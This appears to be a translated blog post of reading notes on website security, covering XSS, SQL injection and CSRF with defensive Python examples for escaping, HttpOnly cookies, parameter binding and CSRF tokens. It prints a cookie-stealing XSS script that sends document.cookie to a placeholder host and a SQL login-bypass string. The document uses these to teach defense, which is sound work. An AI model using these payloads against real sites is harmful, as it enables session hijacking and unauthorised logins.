[Reading notes] website security architecture

Foreword

Before these reading notes I wrote up the five architectural elements described in Li Zhihui's book "Large-Scale Website Technology Architecture": performance, availability, scalability, extensibility and security. This post covers the security element. The content is drawn mainly from that book, which I recommend highly; in my view it can serve as an introduction to technical architecture.

Security, in this sense, means that the system must respond reliably to a variety of attacks.

This post goes through several common attack techniques and the corresponding defenses.

Cross-site scripting attacks (XSS)

XSS (Cross-Site Scripting) lets an attacker inject code, typically HTML and JavaScript, into pages that other users view.

I. Attack

For example, on a forum site the attacker can publish a post containing:

<script>location.href="//domain.com/?c=" + document.cookie</script>

After the forum renders the post, the page contains:

<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>

Any other user who views this page is redirected to domain.com, with the cookies of the current site appended to the URL. If the forum tracks logged-in users through a session cookie, the attacker can use the stolen cookie to log in as the victim.

II. Harm

  • Steal the user's cookies (session hijacking)
  • Inject a fake form into the page to phish the user's personal information

III. Defenses

1. Sanitization (escaping)

An XSS attack generally works by smuggling a malicious script into a request parameter. Such scripts are rarely legitimate user input, so filtering or sanitizing them, that is, HTML-escaping the dangerous characters (for example '<' becomes '&lt;' and '>' becomes '&gt;'), prevents the injected HTML and JavaScript from executing. The escaping must match the context the value is written into: inside an HTML attribute the quote characters must be escaped as well, and values written into JavaScript or URLs need their own encoding.

Sanitization is a necessary anti-XSS measure for almost every website.

2 . HttpOnly

Setting the HttpOnly attribute on a cookie prevents JavaScript from reading it: document.cookie no longer exposes it, so a script injected via XSS cannot steal the session cookie. It does not stop the injected script from doing other damage, such as issuing requests on the user's behalf, so it complements escaping rather than replacing it.
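As an added example (my code, not the book's or the original post's), the following Python applies both defenses to the forum payload quoted above: the post body is HTML-escaped on output, a value placed in an attribute is escaped with quotes included, and the session cookie is issued with HttpOnly. The cookie name, the Secure/SameSite attributes and the data-title attribute are assumptions made for illustration.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: the forum post from the XSS example above.
MALICIOUS_POST = '<script>location.href="//domain.com/?c=" + document.cookie</script>'


def render_post(body: str) -> str:
    """Render a user-supplied post body inside <p>...</p>.

    The body is HTML-escaped on output: '<', '>', '&', '"' and "'" become
    entity references, so the browser displays the payload as text
    instead of executing it.
    """
    return "<p>" + html.escape(body, quote=True) + "</p>"


def render_attribute(value: str) -> str:
    """Escape a user-supplied value placed inside a quoted HTML attribute.

    Escaping only '<' and '>' is not enough here: the quote characters
    must be escaped too, and the template must quote the attribute,
    otherwise the value can close the attribute and add its own
    (e.g. an onmouseover handler).  'data-title' is a hypothetical attribute.
    """
    return 'data-title="' + html.escape(value, quote=True) + '"'


def session_cookie_header(session_id: str) -> str:
    """Build the Set-Cookie value for the session cookie with HttpOnly set.

    HttpOnly keeps the cookie out of document.cookie, so a script that
    slipped past escaping still cannot read it.  Secure and SameSite=Lax
    are added as well (assumed policy for this example).
    """
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()


if __name__ == "__main__":
    print(render_post(MALICIOUS_POST))
    print(render_attribute('x" onmouseover="alert(1)'))
    print("Set-Cookie: " + session_cookie_header("constructed-session-id"))
```

Escaping happens when the value is written into the page, not when it is stored; storing the raw post and escaping on output keeps the data reusable in other contexts (JSON APIs, e-mail) that need different encodings.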

SQL injection attacks

An attacker injects SQL fragments into an HTTP request. The server builds its SQL command from the request parameters, so the malicious fragment is concatenated into the command and executed by the database.


I. Attack

For example, a website's login check builds its SQL query as:

sql = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"

If the user submits:

userName = "1' OR '1'='1";
passWord = "1' OR '1'='1";

then the query string becomes:

sql = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"

Both WHERE conditions are now always true, so the query runs without any valid credentials and is equivalent to:

sql = "SELECT * FROM users;"

II. Defenses

1. Sanitization

As with XSS, sanitizing request parameters is a crude but partly effective measure: a filter matches request data that looks like SQL injection, such as "drop table", and rejects it. Keyword blacklists are easy to bypass (case changes, comments, encodings) and reject legitimate input that happens to contain those words, so they should only supplement parameter binding, never replace it.

2. Parameter binding

In Java, PreparedStatement precompiles the SQL statement; the application then passes the parameters separately and can execute the statement repeatedly. Because the parameters are never concatenated into the SQL text, user input cannot change the structure of the query, which prevents SQL injection.

PreparedStatement ps = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");
ps.setString(1, userid);
ps.setString(2, password);
ResultSet rs = ps.executeQuery();
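Added example (my code, in Python with the built-in sqlite3 module rather than the book's Java): the concatenated login query from the attack section runs beside a parameter-bound version against a constructed two-user table, so the bypass and the fix can be seen on the same input. The user names, the clear-text passwords and the table layout are made up for the example.

```python
import sqlite3

# Constructed sample data: two users; passwords are stored in clear text only
# to keep the example short (a real system stores salted password hashes).
USERS = [("alice", "s3cret"), ("bob", "hunter2")]
# The injection string from the example above, used for both fields.
PAYLOAD = "1' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table filled with the sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn: sqlite3.Connection, user_name: str, password: str) -> list:
    """The query from the attack section: values concatenated into the SQL text.

    Anything the user types becomes part of the statement, so the quote in
    the payload ends the literal and the OR clauses make the WHERE true.
    """
    sql = ("SELECT * FROM users WHERE (name = '" + user_name + "') "
           "and (pw = '" + password + "');")
    return conn.execute(sql).fetchall()


def safe_login(conn: sqlite3.Connection, user_name: str, password: str) -> list:
    """Parameter binding: the SQL text is fixed, values are sent separately.

    The driver never splices the values into the statement, so a quote in
    the input is just a character in a string, not SQL syntax.
    """
    sql = "SELECT * FROM users WHERE name = ? AND pw = ?"
    return conn.execute(sql, (user_name, password)).fetchall()


def compare_logins(user_name: str, password: str) -> tuple:
    """Run the same credentials through both versions; return (vulnerable, safe)."""
    conn = make_db()
    return vulnerable_login(conn, user_name, password), safe_login(conn, user_name, password)


if __name__ == "__main__":
    vuln_rows, safe_rows = compare_logins(PAYLOAD, PAYLOAD)
    print("concatenated query returned:", vuln_rows)   # every user: login bypassed
    print("bound query returned:      ", safe_rows)    # nothing: payload is just a string
    print("legitimate login:          ", compare_logins("alice", "s3cret"))
```

A side benefit of binding shows up with ordinary input: a name such as o'brien breaks the concatenated query with a syntax error, while the bound query handles it as data.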

Cross-site request forgery (CSRF)

CSRF (Cross-Site Request Forgery): the attacker tricks the user's browser into sending a request to a website where the user is already authenticated, performing some action there (sending e-mail or messages, or even transferring money or making purchases). Because the browser attaches the authentication cookies automatically, the target site believes the real user performed the action.

XSS exploits the trust a user places in a given website; CSRF exploits the trust a website places in the user's browser.

Means of defense

1. Form Token

The server generates a random token, embeds it in the form (and remembers it in the user's session), and requires the client to send the token back with the request. A page on another site cannot read the token, so a forged request fails the check.

2. Verification code

Because a CSRF attack happens without the user noticing, requiring the user to enter a verification code (CAPTCHA) ensures the user is aware of the operation being performed.

3. Check the Referer header field

The Referer header in an HTTP request identifies the address the request came from. Checking that this address is under the same domain as the request's target blocks most CSRF attacks.

This approach is simple and cheap: only the critical operations need the check. But it has limits, because it relies entirely on the browser sending a correct Referer. Although the HTTP specification defines the field, not every visiting browser is guaranteed to implement it correctly, a browser may have vulnerabilities that affect the field, and some browsers or extensions let the user suppress or alter the Referer. The server then has to decide whether a request with no Referer is rejected (losing those users) or allowed (losing the protection).
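Added example for the form token and the Referer check together (my code, not the book's): a per-session random token is issued and verified in constant time, and the request source is checked through the Origin header with Referer as a fallback, matching the host exactly. The site host forum.example, the dict-shaped session, headers and form, and the attacker's origin evil.example are assumptions for the example.

```python
import hmac
import secrets
from typing import Optional
from urllib.parse import urlsplit

SITE_HOST = "forum.example"   # assumed host of the protected site


def issue_csrf_token(session: dict) -> str:
    """Create the per-session random token that the server embeds in the form.

    One token per session is enough for this example; it lives server-side
    in the session (a dict here) and is reused until the session ends.
    """
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def token_is_valid(session: dict, submitted: Optional[str]) -> bool:
    """The client must echo the token back; compare in constant time."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def source_is_same_site(headers: dict) -> bool:
    """Check where the request came from.

    Origin is consulted first (browsers send it on cross-site POSTs),
    Referer as a fallback.  The host is compared exactly: a prefix or
    substring test would accept forum.example.evil.com.  With neither
    header present the request is rejected, which also drops requests
    from browsers or extensions that strip Referer; that is the trade-off
    described in the text.  Header names are assumed already normalised.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).hostname == SITE_HOST


def csrf_check(session: dict, headers: dict, form: dict) -> bool:
    """Accept a state-changing request only if both defenses pass."""
    return token_is_valid(session, form.get("csrf_token")) and source_is_same_site(headers)


def simulate() -> tuple:
    """Constructed requests: a real form submission and a forged cross-site one."""
    session = {}                       # the victim's server-side session
    token = issue_csrf_token(session)  # embedded in the form the site served
    genuine = csrf_check(
        session,
        {"Origin": "https://forum.example", "Referer": "https://forum.example/transfer"},
        {"csrf_token": token, "amount": "100"},
    )
    # The attacker's page auto-submits the same form.  The browser attaches the
    # session cookie (so `session` is still the victim's), but the page cannot
    # read the token and the browser reports the attacker's origin.
    forged = csrf_check(
        session,
        {"Origin": "https://evil.example", "Referer": "https://evil.example/lure"},
        {"csrf_token": "", "amount": "100"},
    )
    return genuine, forged


if __name__ == "__main__":
    print("genuine accepted, forged accepted:", simulate())
```

The token check is the one that actually stops the forgery; the source check is a cheap second layer, and the example rejects requests with neither Origin nor Referer rather than waving them through.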


Source: blog.csdn.net/u013568373/article/details/91371691